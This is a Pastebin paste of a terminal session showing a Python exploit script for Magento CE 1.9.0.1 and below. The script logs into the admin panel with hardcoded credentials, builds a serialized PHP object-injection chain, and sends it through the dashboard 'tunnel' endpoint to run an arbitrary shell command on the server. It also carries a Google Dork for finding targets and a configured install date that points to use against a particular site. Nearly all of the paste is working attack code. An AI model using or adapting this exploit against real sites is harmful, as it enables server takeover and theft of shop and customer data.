Advertisement
Guest User

Untitled

a guest
May 15th, 2019
452
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.74 KB | None | 0 0
  1. root@kali:~/Downloads# cat 37811.py
  2. #!/usr/bin/python
  3. # Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
  4. # Google Dork: "Powered by Magento"
  5. # Date: 08/18/2015
  6. # Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
  7. # Vendor Homepage: http://magento.com/
  8. # Software Link: https://www.magentocommerce.com/download
  9. # Version: 1.9.0.1 and below
  10. # Tested on: Ubuntu 15
  11. # CVE : none
  12.  
  13. from hashlib import md5
  14. import sys
  15. import re
  16. import base64
  17. import mechanize
  18.  
  19.  
  20. def usage():
  21. print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
  22. sys.exit()
  23.  
  24.  
  25. if len(sys.argv) != 3:
  26. usage()
  27.  
  28. # Command-line args
  29. target = sys.argv[1]
  30. arg = sys.argv[2]
  31.  
  32. # Config.
  33. username = 'ypwq'
  34. password = '123'
  35. php_function = 'system' # Note: we can only pass 1 argument to the function
  36. install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
  37.  
  38. # POP chain to pivot into call_user_exec
  39. payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
  40. '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
  41. 'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
  42. 'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
  43. '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
  44. ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
  45. len(arg), arg)
  46. # Setup the mechanize browser and options
  47. br = mechanize.Browser()
  48. #br.set_proxies({"http": "localhost:8080"})
  49. br.set_handle_robots(False)
  50.  
  51. request = br.open(target)
  52.  
  53. br.select_form(nr=0)
  54. br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
  55. br.form.fixup()
  56. br['login[username]'] = username
  57. br['login[password]'] = password
  58.  
  59. br.method = "POST"
  60. request = br.submit()
  61. content = request.read()
  62.  
  63. url = re.search("ajaxBlockUrl = \'(.*)\'", content)
  64. url = url.group(1)
  65. key = re.search("var FORM_KEY = '(.*)'", content)
  66. key = key.group(1)
  67.  
  68. request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
  69. tunnel = re.search("src=\"(.*)\?ga=", request.read())
  70. tunnel = tunnel.group(1)
  71.  
  72. payload = base64.b64encode(payload)
  73. gh = md5(payload + install_date).hexdigest()
  74.  
  75. exploit = tunnel + '?ga=' + payload + '&h=' + gh
  76.  
  77. try:
  78. request = br.open(exploit)
  79. except (mechanize.HTTPError, mechanize.URLError) as e:
  80. print e.read()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement